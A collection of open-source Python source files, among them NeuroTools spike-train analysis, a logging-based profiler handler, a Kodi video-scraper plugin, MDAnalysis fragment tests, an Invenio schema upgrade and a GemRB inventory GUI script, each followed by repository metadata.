#Check whether sua1 and sua2 are SpikeTrains or arrays
sua = []
for x in (sua1, sua2):
#if isinstance(x, SpikeTrain):
if hasattr(x, 'spike_times'):
sua.append(x.spike_times)
elif x.ndim == 1:
sua.append(x)
elif x.ndim == 2 and (x.shape[0] == 1 or x.shape[1] == 1):
sua.append(x.ravel())
else:
raise TypeError("sua1 and sua2 must be either instances of the" \
"SpikeTrain class or column/row vectors")
sua1 = sua[0]
sua2 = sua[1]
if sua1.size < sua2.size:
if lag is None:
lag = np.ceil(10*np.mean(np.diff(sua1)))
reverse = False
else:
if lag is None:
lag = np.ceil(20*np.mean(np.diff(sua2)))
sua1, sua2 = sua2, sua1
reverse = True
#construct predictor
if predictor is 'shuffle':
isi = np.diff(sua2)
sua2_ = np.array([])
for ni in xrange(1,n_pred+1):
idx = np.random.permutation(isi.size-1)
sua2_ = np.append(sua2_, np.add(np.insert(
(np.cumsum(isi[idx])), 0, 0), sua2.min() + (
np.random.exponential(isi.mean()))))
#calculate cross differences in spike times
differences = np.array([])
pred = np.array([])
for k in xrange(0, sua1.size):
differences = np.append(differences, sua1[k] - sua2[np.nonzero(
(sua2 > sua1[k] - lag) & (sua2 < sua1[k] + lag))])
if predictor == 'shuffle':
for k in xrange(0, sua1.size):
pred = np.append(pred, sua1[k] - sua2_[np.nonzero(
(sua2_ > sua1[k] - lag) & (sua2_ < sua1[k] + lag))])
if reverse is True:
differences = -differences
pred = -pred
norm = np.sqrt(sua1.size * sua2.size)
# Plot the results if display=True
if display:
subplot = get_display(display)
if not subplot or not HAVE_PYLAB:
return differences, pred, norm
else:
# Plot the cross-correlation
try:
counts, bin_edges = np.histogram(differences, **kwargs)
edge_distances = np.diff(bin_edges)
bin_centers = bin_edges[1:] - edge_distances/2
counts = counts / norm
xlabel = "Time"
ylabel = "Cross-correlation coefficient"
#NOTE: the x axis corresponds to the upper edge of each bin
subplot.plot(bin_centers, counts, label='cross-correlation', color='b')
if predictor is None:
set_labels(subplot, xlabel, ylabel)
pylab.draw()
elif predictor is 'shuffle':
# Plot the predictor
norm_ = norm * n_pred
counts_, bin_edges_ = np.histogram(pred, **kwargs)
counts_ = counts_ / norm_
subplot.plot(bin_edges_[1:], counts_, label='predictor')
subplot.legend()
pylab.draw()
except ValueError:
print "There are no correlated events within the selected lag"\
" window of %s" % lag
else:
return differences, pred, norm
def _dict_max(D):
"""For a dict containing numerical values, return the key for the
highest value. If there is more than one item with the same highest
value, return one of them (arbitrary - depends on the order produced
by the iterator).
"""
max_val = max(D.values())
for k in D:
if D[k] == max_val:
return k
def make_kernel(form, sigma, time_stamp_resolution, direction=1):
    """Creates kernel functions for convolution.
    Constructs a numeric linear convolution kernel of basic shape to be used
    for data smoothing (linear low pass filtering) and firing rate estimation
    from single trial or trial-averaged spike trains.
    Exponential and alpha kernels may also be used to represent postynaptic
    currents / potentials in a linear (current-based) model.
    Adapted from original script written by Martin P. Nawrot for the
    FIND MATLAB toolbox [1]_ [2]_.
    Parameters
    ----------
    form : {'BOX', 'TRI', 'GAU', 'EPA', 'EXP', 'ALP'}
        Kernel form. Currently implemented forms are BOX (boxcar),
        TRI (triangle), GAU (gaussian), EPA (epanechnikov), EXP (exponential),
        ALP (alpha function). EXP and ALP are aymmetric kernel forms and
        assume optional parameter `direction`. Case-insensitive.
    sigma : float
        Standard deviation of the distribution associated with kernel shape.
        This parameter defines the time resolution (in ms) of the kernel estimate
        and makes different kernels comparable (cf. [1] for symetric kernels).
        This is used here as an alternative definition to the cut-off
        frequency of the associated linear filter.
    time_stamp_resolution : float
        Temporal resolution of input and output in ms.
    direction : {-1, 1}
        Asymmetric kernels have two possible directions.
        The values are -1 or 1, default is 1. The
        definition here is that for direction = 1 the
        kernel represents the impulse response function
        of the linear filter. Default value is 1.
    Returns
    -------
    kernel : array_like
        Array of kernel. The length of this array is always an odd
        number to represent symmetric kernels such that the center bin
        coincides with the median of the numeric array, i.e for a
        triangle, the maximum will be at the center bin with equal
        number of bins to the right and to the left.
    norm : float
        For rate estimates. The kernel vector is normalized such that
        the sum of all entries equals unity sum(kernel)=1. When
        estimating rate functions from discrete spike data (0/1) the
        additional parameter `norm` allows for the normalization to
        rate in spikes per second.
        For example:
        ``rate = norm * scipy.signal.lfilter(kernel, 1, spike_data)``
    m_idx : int
        Index of the numerically determined median (center of gravity)
        of the kernel function.
    Examples
    --------
    To obtain single trial rate function of trial one should use::
        r = norm * scipy.signal.fftconvolve(sua, kernel)
    To obtain trial-averaged spike train one should use::
        r_avg = norm * scipy.signal.fftconvolve(sua, np.mean(X,1))
    where `X` is an array of shape `(l,n)`, `n` is the number of trials and
    `l` is the length of each trial.
    See also
    --------
    SpikeTrain.instantaneous_rate
    SpikeList.averaged_instantaneous_rate
    .. [1] Meier R, Egert U, Aertsen A, Nawrot MP, "FIND - a unified framework
       for neural data analysis"; Neural Netw. 2008 Oct; 21(8):1085-93.
    .. [2] Nawrot M, Aertsen A, Rotter S, "Single-trial estimation of neuronal
       firing rates - from single neuron spike trains to population activity";
       J. Neurosci Meth 94: 81-92; 1999.
    """
    form = form.upper()  # normalize once instead of calling upper() per branch
    assert form in ('BOX', 'TRI', 'GAU', 'EPA', 'EXP', 'ALP'), "form must \
    be one of either 'BOX','TRI','GAU','EPA','EXP' or 'ALP'!"
    assert direction in (1, -1), "direction must be either 1 or -1"
    SI_sigma = sigma / 1000.  # convert to SI units (ms -> s)
    SI_time_stamp_resolution = time_stamp_resolution / 1000.  # convert to SI units (ms -> s)
    # scale factor turning a unit-area kernel into a rate in spikes/s
    norm = 1. / SI_time_stamp_resolution
    if form == 'BOX':
        w = 2.0 * SI_sigma * np.sqrt(3)
        # int(): np.floor returns a float, but numpy requires integer
        # array shapes; 2*k+1 keeps the bin count odd
        width = 2 * int(np.floor(w / 2.0 / SI_time_stamp_resolution)) + 1
        height = 1. / width
        kernel = np.ones((1, width)) * height  # area = 1
    elif form == 'TRI':
        w = 2 * SI_sigma * np.sqrt(6)
        halfwidth = np.floor(w / 2.0 / SI_time_stamp_resolution)
        trileft = np.arange(1, halfwidth + 2)
        triright = np.arange(halfwidth, 0, -1)  # odd number of bins
        triangle = np.append(trileft, triright)
        kernel = triangle / triangle.sum()  # area = 1
    elif form == 'EPA':
        w = 2.0 * SI_sigma * np.sqrt(5)
        halfwidth = np.floor(w / 2.0 / SI_time_stamp_resolution)
        base = np.arange(-halfwidth, halfwidth + 1)
        parabula = base**2
        epanech = parabula.max() - parabula  # inverse parabula
        kernel = epanech / epanech.sum()  # area = 1
    elif form == 'GAU':
        w = 2.0 * SI_sigma * 2.7  # > 99% of distribution weight
        halfwidth = np.floor(w / 2.0 / SI_time_stamp_resolution)  # always odd
        base = np.arange(-halfwidth, halfwidth + 1) * SI_time_stamp_resolution
        g = np.exp(-(base**2) / 2.0 / SI_sigma**2) / SI_sigma / np.sqrt(2.0 * np.pi)
        kernel = g / g.sum()
    elif form == 'ALP':
        w = 5.0 * SI_sigma
        alpha = np.arange(1, (2.0 * np.floor(w / SI_time_stamp_resolution / 2.0) + 1) + 1) * SI_time_stamp_resolution
        alpha = (2.0 / SI_sigma**2) * alpha * np.exp(-alpha * np.sqrt(2) / SI_sigma)
        kernel = alpha / alpha.sum()  # normalization
        if direction == -1:
            kernel = np.flipud(kernel)
    elif form == 'EXP':
        w = 5.0 * SI_sigma
        expo = np.arange(1, (2.0 * np.floor(w / SI_time_stamp_resolution / 2.0) + 1) + 1) * SI_time_stamp_resolution
        expo = np.exp(-expo / SI_sigma)
        kernel = expo / expo.sum()
        if direction == -1:
            kernel = np.flipud(kernel)
    kernel = kernel.ravel()  # BOX builds a (1, width) array; flatten all forms
    # index of the first bin where the cumulative mass reaches one half
    m_idx = np.nonzero(kernel.cumsum() >= 0.5)[0].min()
    return kernel, norm, m_idx
def simple_frequency_spectrum(x):
    """Simple frequency spectrum.
    Very simple calculation of frequency spectrum with no detrending,
    windowing, etc, just the first half (positive frequency components) of
    abs(fft(x))
    Parameters
    ----------
    x : array_like
        The input array, in the time-domain.
    Returns
    -------
    spec : array_like
        The frequency spectrum of `x` (``len(x)//2`` bins); amplitudes of
        the sine components, with the DC component left unscaled.
    """
    spec = np.absolute(np.fft.fft(x))
    # floor division: `len(x) / 2` is a float under Python 3 and would
    # raise TypeError when used as a slice index
    spec = spec[:len(x) // 2]  # take positive frequency components
    spec /= len(x)  # normalize
    spec *= 2.0  # to get amplitudes of sine components, need to multiply by 2
    if spec.size:  # inputs shorter than 2 samples yield an empty spectrum
        spec[0] /= 2.0  # except for the dc component
    return spec
class TuningCurve(object):
    """Class to facilitate working with tuning curves.
    Accumulates, for each key (e.g. a stimulus condition), the list of
    values added over `n` successive calls to `add()`.
    """
    def __init__(self, D=None):
        """
        If `D` is a dict, it is used to give initial values to the tuning curve.
        """
        self._tuning_curves = {}  # key -> list of accumulated values
        self._counts = {}         # key -> number of values accumulated
        if D is not None:
            for k,v in D.items():
                self._tuning_curves[k] = [v]
                self._counts[k] = 1
            self.n = 1
        else:
            self.n = 0
    def add(self, D):
        """Append one value per key from dict `D` (keys must already exist)."""
        for k,v in D.items():
            self._tuning_curves[k].append(v)
            self._counts[k] += 1
        self.n += 1
    def __getitem__(self, i):
        """Return the i-th added measurement as ``{key: i-th value}``.
        Bug fix: the original iterated ``self._tuning_curves[k].items()``
        with ``k`` unbound, raising UnboundLocalError on any indexing.
        """
        D = {}
        for k, v in self._tuning_curves.items():
            D[k] = v[i]
        return D
    def __repr__(self):
        return "TuningCurve: %s" % self._tuning_curves
    def stats(self):
        """Return the mean tuning curve with stderrs."""
        mean = {}
        stderr = {}
        n = self.n
        for k in self._tuning_curves.keys():
            arr = np.array(self._tuning_curves[k])
            mean[k] = arr.mean()
            # population std rescaled toward an unbiased standard error;
            # note: requires n >= 2 (division by n-1)
            stderr[k] = arr.std()*n/(n-1)/np.sqrt(n)
        return mean, stderr
    def max(self):
        """Return the key of the max value and the max value."""
        # NOTE(review): values here are *lists*, so _dict_max compares them
        # lexicographically and the whole list is returned -- presumably
        # intended for single-entry curves; verify against callers.
        k = _dict_max(self._tuning_curves)
        return k, self._tuning_curves[k]
| meduz/NeuroTools | src/analysis.py | Python | gpl-2.0 | 17,761 |
import sys
import logging
import profile
import pstats
try:
import cStringIO as StringIO
StringIO # pyflakes
except ImportError:
import StringIO
from instrumenting import utils
class BaseProfilingHandler(utils.InstrumentingHandler):
    """
    Python logging handler which profiles code.
    It can also optionally log profiling stats and/or dump the raw
    stats to a file.
    """
    def __init__(self, start=False, stop=False, functions=None,
                 restriction=None, strip_dirs=True,
                 sort_stats=None, print_formats=None,
                 level=logging.NOTSET):
        """Configure the handler.
        `start`/`stop` control whether an emitted record starts or stops
        the profiler; `restriction`, `strip_dirs`, `sort_stats` and
        `print_formats` are passed through to `pstats` when stats are
        logged. `None` defaults (replacing the previous shared mutable
        defaults [50], ['cumulative'] and ['stats']) are expanded below.
        """
        utils.InstrumentingHandler.__init__(self, level=level)
        self.start = start
        self.stop = stop
        self.functions = functions
        self.restriction = [50] if restriction is None else restriction
        self.strip_dirs = strip_dirs
        self.sort_stats = ['cumulative'] if sort_stats is None else sort_stats
        self.print_formats = ['stats'] if print_formats is None else print_formats
        # Fixes vs. original: restriction/strip_dirs/sort_stats were never
        # stored (AttributeError in log_stats), and setUpProfiler() ran
        # before self.functions was assigned, breaking subclasses that
        # read it (e.g. ProfileHandler).
        self.setUpProfiler()
    def emit(self, record):
        """
        Start or stop the configured profiler logging details.
        If the handler is configured to start the profiler and it is
        already started, a warning message is logged and it is left
        running. Similarly, if the handler is configured to stop the
        profiler and it is already stopped, a warning message is
        logged and it is not started.
        In order to avoid surprising performance impacts, if the
        handler is configured such that it enables and disables the
        profiler for the same single log message, an error message is
        logged but the profiler is still disabled.
        """
        started = False
        if self.start:
            if self.running():
                self.log(logging.WARNING,
                         'Profiler %r already running, ignoring start'
                         % self.profiler)
            else:
                self.log(logging.INFO,
                         'Starting profiler %r' % self.profiler)
                self.enable()
                started = True
        if self.stop:
            if not self.running():
                self.log(logging.WARNING,
                         'Profiler %r not running, ignoring stop'
                         % self.profiler)
            else:
                if started:
                    self.log(logging.ERROR,
                             'Handler for profiler %r configured to start '
                             'and stop for the same log message'
                             % self.profiler)
                self.log(logging.INFO,
                         'Stopping profiler %r' % self.profiler)
                self.disable()
        # only dump stats on records that did not just start the profiler
        if not started and self.print_formats:
            self.log(logging.DEBUG, 'Printing profiler %r stats:\n%s'
                     % (self.profiler, self.log_stats()))
    def log_stats(self):
        """Render the collected stats via pstats and return them as a string."""
        stream = StringIO.StringIO()
        stats = self.get_stats(stream)
        if stats is None:
            return
        if self.strip_dirs:
            stats.strip_dirs()
        if self.sort_stats:
            # pstats expects the sort keys as individual arguments
            stats.sort_stats(*self.sort_stats)
        for method in self.print_formats:
            getattr(stats, 'print_' + method)(*self.restriction)
        # str.getvalue(), not getvalues(): the original raised AttributeError
        return stream.getvalue()
    # Profiler specific support
    def setUpProfiler(self):
        """Set up the selected profiler."""
        # raise the exception class; `raise NotImplemented` is a TypeError
        raise NotImplementedError
    def enable(self):
        """Install the profiler hook."""
        raise NotImplementedError
    def disable(self):
        """Remove the profiler hook."""
        raise NotImplementedError
    def running(self):
        """Return True if a profiler of our type is currently installed."""
        return isinstance(sys.getprofile(), type(self.profiler))
    def get_stats(self, stream):
        """Return a pstats.Stats for the profiler, or None if still running."""
        if self.running():
            self.log(logging.ERROR,
                     "Cannot get stats when the profiler from the "
                     "`profile` module is already running")
            return None
        stats = pstats.Stats(self.profiler, stream=stream)
        return stats
class ProfileHandler(BaseProfilingHandler):
    """Use the pure-python `profile` module to profile on logging events."""
    def setUpProfiler(self):
        # `profile` cannot attach to an already-running stack, so the
        # handler must be given an explicit set of functions to profile.
        if not self.functions:
            raise ValueError(
                'The `profile` module does not support profiling '
                'an already running stack')
        self.profiler = profile.Profile()
    def running(self):
        # The hook profile.Profile installs is its bound `dispatcher`
        # method: check both identity and the owning instance's type.
        # NOTE(review): `im_self` is the Python 2 bound-method attribute
        # (`__self__` on Python 3) -- this module appears Py2-only.
        hook = sys.getprofile()
        return (hook is self.profiler.dispatcher
                and isinstance(hook.im_self, type(self.profiler)))
| rpatterson/instrumenting | src/instrumenting/profilehandler.py | Python | gpl-2.0 | 4,513 |
"""
SALTS XBMC Addon
Copyright (C) 2014 tknorris
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import re
import urlparse
import kodi
import log_utils # @UnusedImport
import dom_parser
from salts_lib import scraper_utils
from salts_lib.constants import FORCE_NO_MATCH
from salts_lib.constants import QUALITIES
from salts_lib.constants import VIDEO_TYPES
import scraper
BASE_URL = 'http://rlseries.com'
class Scraper(scraper.Scraper):
    """SALTS scraper for rlseries.com (season and episode sources)."""
    base_url = BASE_URL
    def __init__(self, timeout=scraper.DEFAULT_TIMEOUT):
        self.timeout = timeout
        # user-configurable base URL overrides the module default
        self.base_url = kodi.get_setting('%s-base_url' % (self.get_name()))
    @classmethod
    def provides(cls):
        # video types this scraper can supply sources for
        return frozenset([VIDEO_TYPES.SEASON, VIDEO_TYPES.EPISODE])
    @classmethod
    def get_name(cls):
        return 'RLSeries'
    def get_sources(self, video):
        # Scrape the video's page and return hoster dicts for every
        # outbound link found in the <div class="v_ifo"> fragment.
        source_url = self.get_url(video)
        hosters = []
        if source_url and source_url != FORCE_NO_MATCH:
            page_url = urlparse.urljoin(self.base_url, source_url)
            html = self._http_get(page_url, cache_limit=1)
            fragment = dom_parser.parse_dom(html, 'div', {'class': 'v_ifo'})
            if fragment:
                for stream_url in dom_parser.parse_dom(fragment[0], 'a', ret='href'):
                    host = urlparse.urlparse(stream_url).hostname
                    quality = scraper_utils.get_quality(video, host, QUALITIES.HIGH)
                    hoster = {'multi-part': False, 'host': host, 'class': self, 'quality': quality, 'views': None, 'rating': None, 'url': stream_url, 'direct': False}
                    hosters.append(hoster)
        return hosters
    def _get_episode_url(self, season_url, video):
        # Three fallback patterns handed to the shared matcher: by episode
        # number, by episode title, and by air date (day/month/year slots).
        episode_pattern = 'href="([^"]*episode-%s-[^"]*)' % (video.episode)
        title_pattern = '<a[^>]*href="(?P<url>[^"]+)[^>]+title="Episode\s+\d+:\s*(?P<title>[^"]+)'
        airdate_pattern = 'class="lst"[^>]+href="([^"]+)(?:[^>]+>){6}{p_day}/{p_month}/{year}<'
        return self._default_get_episode_url(season_url, video, episode_pattern, title_pattern, airdate_pattern)
    def search(self, video_type, title, year, season=''): # @UnusedVariable
        # Walk the site's alphabetical index for the title's first letter,
        # following "next page" links until matches are found.
        results = []
        if title and title[0].isalpha():
            # one-element list doubles as the pagination queue below
            page_url = ['/list/?char=%s' % (title[0])]
            while page_url:
                page_url = urlparse.urljoin(self.base_url, page_url[0])
                html = self._http_get(page_url, cache_limit=48)
                fragment = dom_parser.parse_dom(html, 'ul', {'class': 'list-film-char'})
                if fragment:
                    norm_title = scraper_utils.normalize_title(title)
                    for match in re.finditer('href="([^"]+)[^>]+>(.*?)</a>', fragment[0]):
                        match_url, match_title = match.groups()
                        match_title = re.sub('</?strong>', '', match_title)
                        # filter by requested season when the entry names one
                        match = re.search('Season\s+(\d+)', match_title, re.I)
                        if match:
                            if season and int(season) != int(match.group(1)):
                                continue
                        if norm_title in scraper_utils.normalize_title(match_title):
                            result = {'title': scraper_utils.cleanse_title(match_title), 'year': '', 'url': scraper_utils.pathify_url(match_url)}
                            results.append(result)
                if results:
                    break
                # empty list (no next-page link) terminates the while loop
                page_url = dom_parser.parse_dom(html, 'a', {'class': 'nextpostslink'}, ret='href')
        return results
| JamesLinEngineer/RKMC | addons/plugin.video.salts/scrapers/rlseries_scraper.py | Python | gpl-2.0 | 4,255 |
# -*- Mode: python; tab-width: 4; indent-tabs-mode:nil; coding:utf-8 -*-
# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4 fileencoding=utf-8
#
# MDAnalysis --- https://www.mdanalysis.org
# Copyright (c) 2006-2017 The MDAnalysis Development Team and contributors
# (see the file AUTHORS for the full list of names)
#
# Released under the GNU Public Licence, v2 or any higher version
#
# Please cite your use of MDAnalysis in published work:
#
# R. J. Gowers, M. Linke, J. Barnoud, T. J. E. Reddy, M. N. Melo, S. L. Seyler,
# D. L. Dotson, J. Domanski, S. Buchoux, I. M. Kenney, and O. Beckstein.
# MDAnalysis: A Python package for the rapid analysis of molecular dynamics
# simulations. In S. Benthall and S. Rostrup editors, Proceedings of the 15th
# Python in Science Conference, pages 102-109, Austin, TX, 2016. SciPy.
# doi: 10.25080/majora-629e541a-00e
#
# N. Michaud-Agrawal, E. J. Denning, T. B. Woolf, and O. Beckstein.
# MDAnalysis: A Toolkit for the Analysis of Molecular Dynamics Simulations.
# J. Comput. Chem. 32 (2011), 2319--2327, doi:10.1002/jcc.21787
#
import numpy as np
from numpy.testing import (
assert_equal,
)
import pytest
import MDAnalysis as mda
from MDAnalysis.core.topologyattrs import Bonds
from MDAnalysis.core import groups
from MDAnalysis import NoDataError
from MDAnalysisTests import make_Universe
from MDAnalysisTests.datafiles import TPR, XTC
# Also used in topology/test_guessers
def make_starshape():
    """Build the 125-atom test Universe with star-shaped per-residue bonds.

    Each 5-atom residue is bonded 0-1, 1-2, 1-3, 1-4; residues within a
    segment are chained via atom 4 -> next residue's atom 0, except after
    the last residue of each 25-atom segment.
    """
    universe = make_Universe()
    pairs = []
    # one residue of 5 atoms starts at every multiple of 5 (25 residues)
    for offset in range(0, 125, 5):
        pairs.extend([(offset, offset + 1),
                      (offset + 1, offset + 2),
                      (offset + 1, offset + 3),
                      (offset + 1, offset + 4)])
        # the 5th residue of each segment does not link onwards
        if (offset // 5) % 5 != 4:
            pairs.append((offset + 4, offset + 5))
    universe.add_TopologyAttr(Bonds(pairs))
    return universe
def case1():
    """Universe with star-shaped bond topology (see make_starshape)."""
    return make_starshape()
def case2():
    """Build the 125-atom test Universe with 4-ring pendant bonds.

    Each 5-atom residue forms the ring 1-2-3-4-1 hanging off atom 0;
    residues within a segment are chained atom 0 -> next residue's atom 0,
    except after the last residue of each 25-atom segment.
    """
    universe = make_Universe()
    pairs = []
    # one residue of 5 atoms starts at every multiple of 5 (25 residues)
    for offset in range(0, 125, 5):
        pairs.extend([(offset, offset + 1),
                      (offset + 1, offset + 2),
                      (offset + 2, offset + 3),
                      (offset + 3, offset + 4),
                      (offset + 1, offset + 4)])
        # the 5th residue of each segment does not link onwards
        if (offset // 5) % 5 != 4:
            pairs.append((offset, offset + 5))
    universe.add_TopologyAttr(Bonds(pairs))
    return universe
class TestFragments(object):
    r"""Use 125 atom test Universe
    5 segments of 5 residues of 5 atoms
    Case1
    -----
    Star shapes to try and test the branching prediction
    o | o | o
    | | | | |
    o-o-o-|-o-o-o-|-o-o-o
    | | | | |
    o | o |x3 o
    Case2
    -----
    4-ring pendants to test cyclic conditions
    o------o------o
    | | |
    o o o
    / \ / \ / \
    o o o o o o
    \ / \ / \ /
    o o o
    Test ring molecules?
    """
    # Both topologies partition the 125 atoms into 5 bonded fragments of 25.
    @pytest.mark.parametrize('u', (
        case1(),
        case2()
    ))
    def test_total_frags(self, u):
        fragments = u.atoms.fragments
        fragindices = u.atoms.fragindices
        # should be 5 fragments of 25 atoms
        assert len(fragments) == 5
        for frag in fragments:
            assert len(frag) == 25
        # number of fragindices must correspond to number of atoms:
        assert len(fragindices) == len(u.atoms)
        # number of unique fragindices must correspond to number of fragments:
        assert len(np.unique(fragindices)) == len(fragments)
        # check fragindices dtype:
        assert fragindices.dtype == np.intp
        #check n_fragments
        assert u.atoms.n_fragments == len(fragments)
    @pytest.mark.parametrize('u', (
        case1(),
        case2()
    ))
    def test_frag_external_ordering(self, u):
        # check fragments and fragindices are sorted correctly:
        for i, frag in enumerate(u.atoms.fragments):
            assert frag[0].index == i * 25
            assert np.unique(frag.fragindices)[0] == i
    @pytest.mark.parametrize('u', (
        case1(),
        case2()
    ))
    def test_frag_internal_ordering(self, u):
        # check atoms are sorted within fragments and have the same fragindex:
        for i, frag in enumerate(u.atoms.fragments):
            assert_equal(frag.ix, np.arange(25) + i * 25)
            assert len(np.unique(frag.fragindices)) == 1
            assert frag.n_fragments == 1
    @pytest.mark.parametrize('u', (
        case1(),
        case2()
    ))
    def test_atom_access(self, u):
        # check atom can access fragment and fragindex:
        for at in (u.atoms[0], u.atoms[76], u.atoms[111]):
            frag = at.fragment
            assert isinstance(frag, groups.AtomGroup)
            assert len(frag) == 25
            assert at in frag
            fragindex = at.fragindex
            assert isinstance(fragindex, int)
        # single Atoms expose no n_fragments attribute
        with pytest.raises(AttributeError):
            x = at.n_fragments
    @pytest.mark.parametrize('u', (
        case1(),
        case2()
    ))
    def test_atomgroup_access(self, u):
        # check atomgroup can access fragments
        # first 60 atoms have 3 fragments, given as tuple
        # each fragment should still be 25 atoms
        ag = u.atoms[:60]
        frags = ag.fragments
        assert len(frags) == 3
        assert isinstance(frags, tuple)
        for frag in frags:
            assert len(frag) == 25
        # same for fragindices:
        fragindices = ag.fragindices
        assert len(fragindices) == 60
        assert len(np.unique(fragindices)) == 3
        assert ag.n_fragments == 3
    def test_empty_atomgroup_access(self):
        # an empty selection yields empty fragment containers, not errors
        ag = mda.AtomGroup([], case1())
        assert ag.fragments == tuple()
        assert_equal(ag.fragindices, np.array([], dtype=np.int64))
        assert ag.n_fragments == 0
    # Without a Bonds attribute, fragment properties must raise NoDataError.
    def test_atomgroup_fragments_nobonds_NDE(self):
        # should raise NDE
        u = make_Universe()
        ag = u.atoms[:10]
        with pytest.raises(NoDataError):
            getattr(ag, 'fragments')
        with pytest.raises(NoDataError):
            getattr(ag, 'fragindices')
        with pytest.raises(NoDataError):
            getattr(ag, 'n_fragments')
    def test_atom_fragment_nobonds_NDE(self):
        # should raise NDE
        u = make_Universe()
        with pytest.raises(NoDataError):
            getattr(u.atoms[10], 'fragment')
        with pytest.raises(NoDataError):
            getattr(u.atoms[10], 'fragindex')
    # NOTE(review): the two tests below poke Universe._cache internals;
    # they verify that topology changes invalidate the fragment cache.
    def test_atomgroup_fragment_cache_invalidation_bond_making(self):
        u = case1()
        fgs = u.atoms.fragments
        assert fgs is u.atoms._cache['fragments']
        assert u.atoms._cache_key in u._cache['_valid']['fragments']
        u.add_bonds((fgs[0][-1] + fgs[1][0],))  # should trigger invalidation
        assert 'fragments' not in u._cache['_valid']
        # joining two fragments reduces the fragment count
        assert len(fgs) > len(u.atoms.fragments)  # recomputed
    def test_atomgroup_fragment_cache_invalidation_bond_breaking(self):
        u = case1()
        fgs = u.atoms.fragments
        assert fgs is u.atoms._cache['fragments']
        assert u.atoms._cache_key in u._cache['_valid']['fragments']
        u.delete_bonds((u.atoms.bonds[3],))  # should trigger invalidation
        assert 'fragments' not in u._cache['_valid']
        # breaking a bond splits a fragment, increasing the count
        assert len(fgs) < len(u.atoms.fragments)  # recomputed
def test_tpr_fragments():
    """Fragment attributes of a real TPR/XTC system are self-consistent."""
    atoms = mda.Universe(TPR, XTC).atoms
    fragments = atoms.fragments
    indices = atoms.fragindices
    # first molecule in this system has 3341 atoms
    assert len(fragments[0]) == 3341
    # one fragindex per atom, one unique index per fragment
    assert len(indices) == len(atoms)
    assert len(np.unique(indices)) == len(fragments)
    assert atoms.n_fragments == len(fragments)
| MDAnalysis/mdanalysis | testsuite/MDAnalysisTests/core/test_fragments.py | Python | gpl-2.0 | 7,995 |
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Fixes foreign key relationship."""
from invenio_ext.sqlalchemy import db
from invenio_upgrader.api import op
depends_on = ['invenio_2015_03_03_tag_value']
def info():
    """Return upgrade recipe information."""
    # short human-readable description shown by the upgrade engine
    return "Fixes foreign key relationship."
def do_upgrade():
    """Carry out the upgrade.

    Widens ``oaiHARVESTLOG.bibupload_task_id`` to an unsigned MEDIUMINT(15)
    so it matches the referenced task-id column, keeping the existing
    NOT NULL constraint and '0' server default.
    """
    op.alter_column(
        'oaiHARVESTLOG',
        'bibupload_task_id',
        type_=db.MediumInteger(15, unsigned=True),
        existing_server_default='0',
        existing_nullable=False,
    )
def estimate():
    """Estimate running time of upgrade in seconds (optional)."""
    # single ALTER TABLE on one column: effectively instantaneous
    return 1
def pre_upgrade():
    """Pre-upgrade checks."""
    # no preconditions to verify for this column-type change
    pass
def post_upgrade():
    """Post-upgrade checks."""
    # nothing to verify after the column-type change
    pass
| hachreak/invenio-oaiharvester | invenio_oaiharvester/upgrades/oaiharvester_2015_07_14_innodb.py | Python | gpl-2.0 | 1,535 |
from oracleplsqlsource import OraclePLSQLSource
class OracleJavaSource(OraclePLSQLSource):
    """Oracle Java source object; reuses the PL/SQL source representation."""
    def __init__(self, name, source):
        # object name is stored before delegating source handling to the base
        self.name = name
        #debug_message("debug: generating java source ")
        OraclePLSQLSource.__init__(self,source)
| sawdog/OraclePyDoc | oraclepydoc/oracleobjects/oraclejavasource.py | Python | gpl-2.0 | 261 |
# -*-python-*-
# GemRB - Infinity Engine Emulator
# Copyright (C) 2003-2004 The GemRB Project
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# GUIINV.py - scripts to control inventory windows from GUIINV winpack
###################################################
import GemRB
import GUICommon
import GUICommonWindows
import InventoryCommon
from GUIDefines import *
from ie_stats import *
from ie_slots import *
from ie_spells import *
from ie_restype import RES_BAM
InventoryWindow = None
def InitInventoryWindow (Window):
	"""One-time setup of the GUIINV window: wire controls and event handlers."""
	global InventoryWindow
	Window.AddAlias("WIN_INV")
	InventoryWindow = Window
	#ground items scrollbar
	ScrollBar = Window.GetControl (66)
	ScrollBar.SetEvent (IE_GUI_SCROLLBAR_ON_CHANGE, RefreshInventoryWindow)
	# Ground Items (6)
	for i in range (5):
		Button = Window.GetControl (i+68)
		Button.SetEvent (IE_GUI_MOUSE_ENTER_BUTTON, InventoryCommon.MouseEnterGround)
		Button.SetEvent (IE_GUI_MOUSE_LEAVE_BUTTON, InventoryCommon.MouseLeaveGround)
		Button.SetVarAssoc ("GroundItemButton", i)
		Button.SetFont ("NUMFONT")
	# sixth ground-item button uses control 81 and its own tooltip
	Button = Window.GetControl (81)
	Button.SetTooltip (12011)
	Button.SetVarAssoc ("GroundItemButton", 6)
	Button.SetFont ("NUMFONT")
